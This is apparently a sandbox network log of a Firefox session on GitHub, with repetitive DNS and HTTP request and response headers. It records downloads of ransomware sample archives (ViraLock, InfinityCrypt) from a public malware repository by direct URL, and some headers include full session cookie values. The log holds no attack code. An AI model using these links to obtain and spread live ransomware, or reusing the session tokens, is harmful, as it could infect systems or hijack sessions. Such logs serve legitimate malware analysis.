                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          if-none-match: W/"da2fb7fc841243aeeb0f0b5e00622b6a"
                          te: trailers
                          Response
                          HTTP/2.0 304
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:28:08 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"6ca9b2649cfe1e58c896333ecef2b349"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-github-request-id: C511:1D672B:184B22:1C62D5:6797C227
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN AAAA
                        • flag-us
                          DNS
                          raw.githubusercontent.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          raw.githubusercontent.com
                          IN A
                          Response
                          raw.githubusercontent.com
                          IN A
                          185.199.111.133
                          raw.githubusercontent.com
                          IN A
                          185.199.109.133
                          raw.githubusercontent.com
                          IN A
                          185.199.110.133
                          raw.githubusercontent.com
                          IN A
                          185.199.108.133
                        • flag-us
                          GET
                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/refs/heads/master/ransomwares/ViraLock.zip
                          firefox.exe
                          Remote address:
                          185.199.111.133:443
                          Request
                          GET /Endermanch/MalwareDatabase/refs/heads/master/ransomwares/ViraLock.zip HTTP/2.0
                          host: raw.githubusercontent.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: max-age=300
                          content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                          content-type: application/zip
                          etag: W/"79eacea5c43c84e31b3a658eb626e7271b3a612eb72d61ba73ff0acf54c0c2d1"
                          strict-transport-security: max-age=31536000
                          x-content-type-options: nosniff
                          x-frame-options: deny
                          x-xss-protection: 1; mode=block
                          x-github-request-id: F518:1DE6B:2A0DB:355AF:6797C212
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:27:46 GMT
                          via: 1.1 varnish
                          x-served-by: cache-lcy-eglc8600047-LCY
                          x-cache: MISS
                          x-cache-hits: 0
                          x-timer: S1737998867.594830,VS0,VE359
                          vary: Authorization,Accept-Encoding,Origin
                          access-control-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          x-fastly-request-id: 73f1d2ba0770a90a59a7e6de19178529117e295f
                          expires: Mon, 27 Jan 2025 17:32:46 GMT
                          source-age: 0
                          content-length: 135339
                        • flag-us
                          GET
                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/refs/heads/master/ransomwares/InfinityCrypt.zip
                          firefox.exe
                          Remote address:
                          185.199.111.133:443
                          Request
                          GET /Endermanch/MalwareDatabase/refs/heads/master/ransomwares/InfinityCrypt.zip HTTP/2.0
                          host: raw.githubusercontent.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: max-age=300
                          content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                          content-type: application/zip
                          etag: W/"de6390105ad985b4e4a510c12633c654a71a40c5d3991362d976c82096e419a0"
                          strict-transport-security: max-age=31536000
                          x-content-type-options: nosniff
                          x-frame-options: deny
                          x-xss-protection: 1; mode=block
                          x-github-request-id: 6F33:86C69:2CEE2:385D5:6797C280
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:29:37 GMT
                          via: 1.1 varnish
                          x-served-by: cache-lcy-eglc8600047-LCY
                          x-cache: MISS
                          x-cache-hits: 0
                          x-timer: S1737998977.960631,VS0,VE355
                          vary: Authorization,Accept-Encoding,Origin
                          access-control-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          x-fastly-request-id: 4387be0785be9f33e3a24a34f96871e15d8a9c19
                          expires: Mon, 27 Jan 2025 17:34:37 GMT
                          source-age: 0
                          content-length: 34300
                        • flag-us
                          DNS
                          raw.githubusercontent.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          raw.githubusercontent.com
                          IN A
                          Response
                          raw.githubusercontent.com
                          IN A
                          185.199.109.133
                          raw.githubusercontent.com
                          IN A
                          185.199.111.133
                          raw.githubusercontent.com
                          IN A
                          185.199.108.133
                          raw.githubusercontent.com
                          IN A
                          185.199.110.133
                        • flag-us
                          DNS
                          raw.githubusercontent.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          raw.githubusercontent.com
                          IN AAAA
                          Response
                          raw.githubusercontent.com
                          IN AAAA
                          2606:50c0:8000::154
                          raw.githubusercontent.com
                          IN AAAA
                          2606:50c0:8002::154
                          raw.githubusercontent.com
                          IN AAAA
                          2606:50c0:8001::154
                          raw.githubusercontent.com
                          IN AAAA
                          2606:50c0:8003::154
                        • flag-us
                          DNS
                          raw.githubusercontent.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          raw.githubusercontent.com
                          IN AAAA
                          Response
                          raw.githubusercontent.com
                          IN AAAA
                          2606:50c0:8001::154
                          raw.githubusercontent.com
                          IN AAAA
                          2606:50c0:8002::154
                          raw.githubusercontent.com
                          IN AAAA
                          2606:50c0:8003::154
                          raw.githubusercontent.com
                          IN AAAA
                          2606:50c0:8000::154
                        • flag-us
                          DNS
                          133.111.199.185.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          133.111.199.185.in-addr.arpa
                          IN PTR
                          Response
                          133.111.199.185.in-addr.arpa
                          IN PTR
                          cdn-185-199-111-133githubcom
                        • flag-us
                          DNS
                          support.mozilla.org
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          support.mozilla.org
                          IN A
                          Response
                          support.mozilla.org
                          IN CNAME
                          prod.sumo.prod.webservices.mozgcp.net
                          prod.sumo.prod.webservices.mozgcp.net
                          IN CNAME
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          IN A
                          34.149.128.2
                        • flag-us
                          DNS
                          support.mozilla.org
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          support.mozilla.org
                          IN A
                          Response
                          support.mozilla.org
                          IN CNAME
                          prod.sumo.prod.webservices.mozgcp.net
                          prod.sumo.prod.webservices.mozgcp.net
                          IN CNAME
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          IN A
                          34.149.128.2
                        • flag-us
                          DNS
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          IN A
                          Response
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          IN A
                          34.149.128.2
                        • flag-us
                          DNS
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          29.243.111.52.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          29.243.111.52.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          29.243.111.52.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          29.243.111.52.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN A
                          Response
                          github.com
                          IN A
                          20.26.156.215
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN A
                          Response
                          github.com
                          IN A
                          20.26.156.215
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN A
                          Response
                          github.com
                          IN A
                          20.26.156.215
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN A
                          Response
                          github.com
                          IN A
                          20.26.156.215
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN AAAA
                        • flag-us
                          DNS
                          github.githubassets.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.githubassets.com
                          IN A
                          Response
                          github.githubassets.com
                          IN A
                          185.199.108.154
                          github.githubassets.com
                          IN A
                          185.199.111.154
                          github.githubassets.com
                          IN A
                          185.199.110.154
                          github.githubassets.com
                          IN A
                          185.199.109.154
                        • flag-us
                          DNS
                          github.githubassets.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.githubassets.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          github.githubassets.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.githubassets.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          collector.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          collector.github.com
                          IN A
                          Response
                          collector.github.com
                          IN CNAME
                          glb-db52c2cf8be544.github.com
                          glb-db52c2cf8be544.github.com
                          IN A
                          140.82.113.21
                        • flag-us
                          DNS
                          collector.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          collector.github.com
                          IN A
                          Response
                          collector.github.com
                          IN CNAME
                          glb-db52c2cf8be544.github.com
                          glb-db52c2cf8be544.github.com
                          IN A
                          140.82.112.21
                        • flag-us
                          DNS
                          glb-db52c2cf8be544.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          glb-db52c2cf8be544.github.com
                          IN A
                          Response
                          glb-db52c2cf8be544.github.com
                          IN A
                          140.82.112.21
                        • flag-us
                          DNS
                          glb-db52c2cf8be544.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          glb-db52c2cf8be544.github.com
                          IN A
                          Response
                          glb-db52c2cf8be544.github.com
                          IN A
                          140.82.112.21
                        • flag-us
                          DNS
                          glb-db52c2cf8be544.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          glb-db52c2cf8be544.github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN A
                          Response
                          api.github.com
                          IN A
                          20.26.156.210
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN A
                          Response
                          api.github.com
                          IN A
                          20.26.156.210
                        • flag-gb
                          POST
                          https://api.github.com/_private/browser/stats
                          firefox.exe
                          Remote address:
                          20.26.156.210:443
                          Request
                          POST /_private/browser/stats HTTP/2.0
                          host: api.github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master
                          content-type: text/plain;charset=UTF-8
                          content-length: 677
                          origin: https://github.com
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: no-cors
                          sec-fetch-site: same-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          date: Mon, 27 Jan 2025 17:28:08 GMT
                          content-type: text/plain
                          content-length: 0
                          cache-control: no-cache
                          x-ratelimit-limit: 60
                          x-ratelimit-remaining: 60
                          x-ratelimit-reset: 1738002488
                          x-ratelimit-used: 0
                          x-ratelimit-resource: core
                          x-github-media-type: github.v3; format=json
                          x-github-api-version-selected: 2022-11-28
                          access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
                          content-security-policy: default-src 'none'
                          vary: Accept-Encoding, Accept, X-Requested-With
                          server: github.com
                          x-github-request-id: C542:177590:E350B:115829:6797C228
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          api.github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          api.github.com
                          IN AAAA
                          Response
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN A
                          Response
                          github.com
                          IN A
                          20.26.156.215
                        • flag-us
                          DNS
                          github.com
                          firefox.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          github.com
                          IN A
                          Response
                          github.com
                          IN A
                          20.26.156.215
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/html, application/xhtml+xml
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          turbo-visit: true
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:25 GMT
                          content-type: text/html; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"819f3e9e5957752f77b408a0c0cd4141"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-html-safe: 33e84c7bdcf00760a1e8e79a298b669303c5a66565534ab525c26b9ca425589f
                          x-github-request-id: C56E:2E84B3:182CE7:1C4E3D:6797C274
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/ViraLock.zip
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/latest-commit/master/ransomwares/ViraLock.zip HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:25 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"2687518353e369e3a4dc641a1de024f0"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 453
                          x-github-request-id: C56E:2E84B3:182D52:1C4EAC:6797C275
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/ViraLock.zip
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/ViraLock.zip HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
